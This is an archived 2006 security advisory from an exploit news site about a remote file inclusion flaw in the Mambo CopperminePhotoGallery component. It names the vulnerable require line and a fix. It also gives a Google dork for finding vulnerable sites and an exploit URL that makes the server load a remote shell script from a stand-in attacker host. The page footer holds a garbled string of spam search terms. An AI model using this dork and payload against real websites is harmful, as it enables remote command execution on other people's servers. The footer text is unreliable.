about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Mambo CopperminePhotoGalery Component Remote Include Vulnerability




2006-08-16 Mambo CopperminePhotoGalery Component Remote Include Vulnerability
Rated as : High Risk

###########  CopperminePhotoGallery Component ###########
Found By k1tk4t
Indonesia 
 
  This bug allows a remote atacker to execute commands via RFI

file:
cpg.php  

bug:
require
($mosConfig_absolute_path."/administrator/components/com_cpg/config.cpg.php");



path:
add in cpg.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_cpg

expl:
htttp:/www.site.it/components/com_cpg/cpg.php?mosConfig_absolute_path=

http://evil.xxx/shell.txt?


thanks to

e-c-h-o
h4cky0u
milw0rm
google


securitydot.net - 2006-08-16

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 00:05:16 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.tophdp administra 97tkw.cn 1415 ASSPICTURE news searc ron mail a HOTSEX XXX www.365zha sexi scene adujt sex bbs.imeee. Crack Data www.dbzhao nacked vid 200 /compo aduldt vid W.ww wrold Crack Data Ftp sania mrza www.tkyxgl lo369l www.hrbsun www.worlds persion orts pam openss Trisha bet www.huayay BXCP www.taokez www.animal /data/vul ag-travian ajith fami news for c 2.6.9.17 n...p?dir[ newgrounds www.ashine Oxford dic php-nuke 2 www.2008sf news+for+C Www.worlds www.thkdb. narodno ve sources/te magic phot